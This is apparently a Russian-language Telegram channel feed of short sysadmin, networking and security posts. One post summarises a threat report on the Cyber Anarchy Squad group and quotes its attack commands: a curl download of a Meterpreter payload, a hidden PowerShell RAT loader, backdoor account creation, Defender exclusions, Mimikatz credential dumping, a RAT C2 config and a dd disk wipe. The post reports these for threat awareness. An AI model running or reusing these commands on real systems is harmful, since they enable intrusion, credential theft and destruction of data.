Надоело скачивать софт на винду в интернете?
scoop.sh - пакетный менеджер
scoop.sh - пакетный менеджер
> scoop search python
Results from local buckets...
Name Version Source Binaries
---- ------- ------ --------
python 3.10.5 main
winpython 3.10.4.0 main
> scoop install python
...
Creating shim for 'python.exe'.
'python' (3.10.5) was installed successfully!
🔥3
Forwarded from Кибердом
Как связаны принтеры и стеганография?
Оказывается, напрямую. Принтеры умеют оставлять скрытые метки на каждом распечатанном листе. Такая технология и называется стеганографией, а её идея далеко не нова — вспомните картины Леонардо да Винчи, где до сих пор находят скрытые послания.
В 1992 году компания Xerox придумала, как применить это для безопасности, и запатентовала способ маркировки документов. Его назвали Machine Identification Code (MIC). Если проще — «жёлтые точки». Позже этот подход стали использовать и другие производители принтеров.
🔓 Как это работает?
На листе размещаются едва заметные жёлтые точки, с помощью которых можно определить серийный номер принтера, модель устройства, дату и время печати.
Проверить их наличие просто: энтузиасты из Германии создали сервис Dotspotter, куда можно загрузить скан документа и узнать, есть ли на нём такие метки. Это отличный способ проверить, маркирует ли ваш принтер документы без вашего ведома.
🦖 А студенты из Технического университета Дрездена пошли дальше и разработали фреймворк DEDA для выявления каналов утечки данных и обеспечения безопасности. С его помощью можно:
1. Находить такие точки в документах.
2. «Замусоривать» метки вашего принтера, чтобы никто не смог их использовать.
3. Создавать свои собственные метки, чтобы отследить, куда дальше попадут ваши документы.
Теперь вы знаете, что скрытые механизмы принтеров — это не просто технологии из прошлого, а мощный инструмент для предотвращения утечек и обеспечения конфиденциальности. Расскажите в комментариях, знали о таком способе защиты информации?
#без_бюджетов #Дмитрий_Борощук
🏠 Кибердом & Бизнес
Оказывается, напрямую. Принтеры умеют оставлять скрытые метки на каждом распечатанном листе. Такая технология и называется стеганографией, а её идея далеко не нова — вспомните картины Леонардо да Винчи, где до сих пор находят скрытые послания.
В 1992 году компания Xerox придумала, как применить это для безопасности, и запатентовала способ маркировки документов. Его назвали Machine Identification Code (MIC). Если проще — «жёлтые точки». Позже этот подход стали использовать и другие производители принтеров.
На листе размещаются едва заметные жёлтые точки, с помощью которых можно определить серийный номер принтера, модель устройства, дату и время печати.
Проверить их наличие просто: энтузиасты из Германии создали сервис Dotspotter, куда можно загрузить скан документа и узнать, есть ли на нём такие метки. Это отличный способ проверить, маркирует ли ваш принтер документы без вашего ведома.
1. Находить такие точки в документах.
2. «Замусоривать» метки вашего принтера, чтобы никто не смог их использовать.
3. Создавать свои собственные метки, чтобы отследить, куда дальше попадут ваши документы.
Теперь вы знаете, что скрытые механизмы принтеров — это не просто технологии из прошлого, а мощный инструмент для предотвращения утечек и обеспечения конфиденциальности. Расскажите в комментариях, знали о таком способе защиты информации?
#без_бюджетов #Дмитрий_Борощук
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1💩1🤡1
Начинаем неделю с правильных курсов
https://stepik.org/course/5717/promo
https://stepik.org/course/5717/promo
Stepik: online education
Как правильно бухать на работе
Этот курс научит вас беспалевно вливать вискарик в кофе
😁10🍾7
Эффект ложного консе́нсуса — это склонность проецировать свой способ мышления на других людей
Так произошло и со мной. Около десяти лет назад я где-то увидел удобный способ вставки текста из буфера в консоли Linux и пользовался этим способом каждый день, наивно полагая, что всем вокруг это известно и никто даже не задумывается о том, чтобы открыть vim или другой редактор перед созданием файла.
Вчера я понял, что эта магия известна не каждому. Поэтому решил поделиться ей с вами. Итак, чтобы вставить в файл из буфера обмена в терминале надо сделать:
UPD: естественно, в буфере должен быть какой-то текст перед нажатием
Так произошло и со мной. Около десяти лет назад я где-то увидел удобный способ вставки текста из буфера в консоли Linux и пользовался этим способом каждый день, наивно полагая, что всем вокруг это известно и никто даже не задумывается о том, чтобы открыть vim или другой редактор перед созданием файла.
Вчера я понял, что эта магия известна не каждому. Поэтому решил поделиться ей с вами. Итак, чтобы вставить в файл из буфера обмена в терминале надо сделать:
cat > filename
Ctrl + V
Enter
Ctrl + C
UPD: естественно, в буфере должен быть какой-то текст перед нажатием
Ctrl + V👍19👎3
Курс Large Language Model Agents
Сам курс уже заканчивается, но лекции и слайды доступны
- Foundation of LLMs
- Reasoning
- Planning, tool use
- LLM agent infrastructure
- Retrieval-augmented generation
- Code generation, data science
- Multimodal agents, robotics
- Evaluation and benchmarking on agent applications
- Privacy, safety and ethics
- Human-agent interaction, personalization, alignment
- Multi-agent collaboration
#LLM #course
Сам курс уже заканчивается, но лекции и слайды доступны
- Foundation of LLMs
- Reasoning
- Planning, tool use
- LLM agent infrastructure
- Retrieval-augmented generation
- Code generation, data science
- Multimodal agents, robotics
- Evaluation and benchmarking on agent applications
- Privacy, safety and ethics
- Human-agent interaction, personalization, alignment
- Multi-agent collaboration
#LLM #course
💩3👍2🤮2❤1🔥1👏1
https://github.com/kuberhealthy/kuberhealthy
A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus!
#slachnews #k8s
A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus!
#slachnews #k8s
GitHub
GitHub - kuberhealthy/kuberhealthy: A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus!
A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus! - kuberhealthy/kuberhealthy
👍2🔥2
Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно
И falcosidekick-ui - UI к нему
#falco #security
И falcosidekick-ui - UI к нему
#falco #security
GitHub
GitHub - falcosecurity/falcosidekick: Connect Falco to your ecosystem
Connect Falco to your ecosystem. Contribute to falcosecurity/falcosidekick development by creating an account on GitHub.
👍3
Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
-Процесс cmd.exe запускается как дочерний процесс
- Запуск PowerShell-скриптов:
-Загрузка обратной оболочки Meterpreter через c URL:
-Запуск Revenge RAT через PowerShell:
3. Persistence (Закрепление):
-Создание учетных записей:
-Автозапуск через реестр:
-Создание службы для RAT:
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
-Добавление исключений Windows Defender:
- Имитация системных процессов:
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
WMI-запросы:
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
Выжимку по командам стащил из Linkedin
#security #report
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
cmd.exe /c-Процесс cmd.exe запускается как дочерний процесс
sqlservr.exe- Запуск PowerShell-скриптов:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1
-Загрузка обратной оболочки Meterpreter через c URL:
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe
-Запуск Revenge RAT через PowerShell:
powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())
3. Persistence (Закрепление):
-Создание учетных записей:
net user admin cas /add
net user admin admin123123123 /add
-Автозапуск через реестр:
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");-Создание службы для RAT:
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
$guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet
-Добавление исключений Windows Defender:
powershell Add-MpPreference -ExclusionPath '$windir\$system32'
- Имитация системных процессов:
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
sekurlsa::logonpasswords6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
net user
systeminfo
net localgroup
cd %appdata% && whoami
WMI-запросы:
SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
dd if=/dev/zero of=/dev/[VOLUME] bs=4M
Выжимку по командам стащил из Linkedin
#security #report
securelist.ru
Хактивисты C.A.S атакуют российские организации при помощи редких RAT
Эксперты «Лаборатории Касперского» разбирают атаки группы C.A.S, которая использует редкие троянцы удаленного доступа и публикует данные о жертвах в открытых Telegram-каналах.
👍6🤔2👎1💩1🤣1
Mikrotik Ninja
Давно хотел сделать что-то полезное для сообщества. Идеально было бы для этого совместить свою экспертизу в Mikrotik с навыками DevOps. Идея для проекта пришла из админского опыта. Так вышло, что почти во всех компаниях, где я работал сисадмином или сетевиком…
А на фоне всего этого веселья с Интернетом, хочу напомнить, что у меня для ваших Mikrotik'ов есть мониторинг.
https://news.1rj.ru/str/mikrotikninja/1768
Скоро допилю бота для регистрации без участия человека (меня )
https://news.1rj.ru/str/mikrotikninja/1768
Скоро допилю бота для регистрации без участия человека (меня )
Telegram
Mikrotik Ninja
Давно хотел сделать что-то полезное для сообщества. Идеально было бы для этого совместить свою экспертизу в Mikrotik с навыками DevOps.
Идея для проекта пришла из админского опыта. Так вышло, что почти во всех компаниях, где я работал сисадмином или сетевиком…
Идея для проекта пришла из админского опыта. Так вышло, что почти во всех компаниях, где я работал сисадмином или сетевиком…
🔥13👍8🌚1
Ходят слухи, что в RouterOS завезут EVPN
https://forum.mikrotik.com/viewtopic.php?t=214071#p1120894
https://forum.mikrotik.com/viewtopic.php?t=214071#p1120894
🔥6🤩3🤮1🤡1🖕1
У avito есть классная репа - справочник по работе в ИТ команде. Среди прочего в ней есть описание грейдов инженеров. Полезно для понимания как и куда расти
GitHub
playbook/developer-profile.md at master · avito-tech/playbook
AvitoTech team playbook. Contribute to avito-tech/playbook development by creating an account on GitHub.
👍7🔥3🤡2👎1
Народ на форуме нашёл базу данных из 1990, которую написал какой-то ребёнок, чтобы вести учёт своей коллекции вкладышей для жевачки
Разыскивается автор этого чуда - Вадим Алексеев
Разыскивается автор этого чуда - Вадим Алексеев
🔥59👏6❤2🤡2
Как слабый ноутбук заставил человека разобраться в работе игры без исходников и написать патч, в два раза уменьшающий аппетиты к RAM.
Читается как хороший детектив. Автору моё почтение
https://habr.com/ru/articles/110395/
Читается как хороший детектив. Автору моё почтение
https://habr.com/ru/articles/110395/
Хабр
Как я наказал Firaxis или история о том, как перебрать бинарный движок через глушитель
Речь пойдёт о далёком 2005 году, когда только-только вышла Civilization4 от Sid Meier. К тому времени я плотно висел в Civilization3, прошёл её раз дцать на самых разных картах, и тут вышла...
🔥21👍6
Немножко про сети
Все знают про ширину канала в Wi-Fi и что этих каналов 11 (вы ошибаетесь 😊), но не каждый знает про MCS - Modulation and Coding Scheme
Точка доступа может выбрать разные типы модуляции в зависимости от состояния среды: помехи, уровень сигнала клиента, занятость полосы, ...
От типа модуляции зависит количество передаваемых по сети данных. Вот вам шикарная табличка пропускной способности на разных MCS
#wifi #mcs
Все знают про ширину канала в Wi-Fi и что этих каналов 11 (вы ошибаетесь 😊), но не каждый знает про MCS - Modulation and Coding Scheme
Точка доступа может выбрать разные типы модуляции в зависимости от состояния среды: помехи, уровень сигнала клиента, занятость полосы, ...
От типа модуляции зависит количество передаваемых по сети данных. Вот вам шикарная табличка пропускной способности на разных MCS
#wifi #mcs
MCS Index - MCS Index Table, Modulation and Coding Scheme Index 11n, 11ac, and 11ax
MCS Index Table, Modulation and Coding Scheme Index 11n, 11ac, and 11ax. MCS stands for modulation and coding scheme. The modulation refers to the way data is formatted prior to transmission. The coding scheme refers to how the data is encoded while being…
🔥14👍4
Forwarded from Cult Of Wire
Снова wiki и снова взлом железочек. На этот раз HardBreak, an open-source Hardware Hacking Wiki.
Без срыва покровов и инноваций, но пошагово и в одном месте. Местами ещё есть пробелы, но работа автором проделана большая.
Что уже готово:
- Методология (Как вообще начать ковырять железки)
- Основы (Обзор общих протоколов и инструментов, необходимых для начала работы)
- Разведка (Выявление интересующих точек на печатной плате)
- Взаимодействие с интерфейсами (Как найти и использовать UART, JTAG, SPI)
- Обход мер защиты (voltage glitching)
- Практические ситуации на примере роутера Asus RT-N12 и дрона Parrot Anafi
- Анализ сети и Radio Hacking (в процессе)
Ссылки:
hardbreak.wiki
GitHub: HardBreak
Без срыва покровов и инноваций, но пошагово и в одном месте. Местами ещё есть пробелы, но работа автором проделана большая.
Что уже готово:
- Методология (Как вообще начать ковырять железки)
- Основы (Обзор общих протоколов и инструментов, необходимых для начала работы)
- Разведка (Выявление интересующих точек на печатной плате)
- Взаимодействие с интерфейсами (Как найти и использовать UART, JTAG, SPI)
- Обход мер защиты (voltage glitching)
- Практические ситуации на примере роутера Asus RT-N12 и дрона Parrot Anafi
- Анализ сети и Radio Hacking (в процессе)
Ссылки:
hardbreak.wiki
GitHub: HardBreak
www.hardbreak.wiki
HardBreak - Hardware Hacking Wiki | HardBreak
🔥13🥱1